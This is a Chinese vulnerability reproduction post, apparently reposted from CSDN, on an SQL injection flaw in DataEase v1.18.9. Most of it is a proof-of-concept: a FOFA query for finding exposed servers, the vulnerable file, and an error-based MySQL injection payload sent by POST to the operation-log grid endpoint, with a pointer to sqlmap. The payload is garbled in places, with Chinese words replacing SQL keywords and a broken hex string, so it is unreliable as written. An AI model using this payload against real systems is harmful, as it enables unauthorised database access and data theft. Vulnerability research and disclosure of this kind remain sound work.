1、DataEase数据可视化分析工具简介
DataEase是一款开源的数据可视化分析工具,可以让用户快速分析数据并洞察业务趋势,从而实现业务改进和优化。 DataEase支持丰富的数据源连接,让您可以通过拖放快速创建图表,并轻松与他人共享。
前端:Vue.js、Element
画廊:Apache ECharts、AntV
后端:Spring Boot
中间件:MySQL
数据处理:Kettle、Apache Doris
基础设施:Docker
照片
2、漏洞描述
DataEase存在SQL注入漏洞,不受SQL注入黑名单影响。
3、受影响版本
数据易 v.1.18.9
4、FOFA语句
《数据轻松》
5、漏洞复现
使用${} 表示法的SQL 语句位于以下文件位置: https://github.com/dataease/dataease/blob/dev/backend/src/main/java/io/dataease/ext/query/GridSql.xml
照片
POC
POST /api/log/logGrid/1/10 HTTP/1.1
{\’orders\’:[\’time desc\’],\’conditions\’:[{\’field\’:\’123 AND GTID_SUBSET(CONCAT(0x716a6a6b71,(SELECT version()),0x716a6a6a71),1215)) RLIKE (SELECT (CASE WHEN) )(8626=8626)然后0x31323320414e4420475449445f53554253455428434f4e434154283078373136613661366237312c2853454c45435420766572736 6f6e2829292c307837313661366136613731292c3132313529否则0x28结束))和(7803=7803\’}]}
需要管理员/数据管理员登录
点击操作日志抓包
使用SQLMAP
#【漏洞复现】以上DataEase数据可视化分析工具SQL注入源网相关内容仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92602.html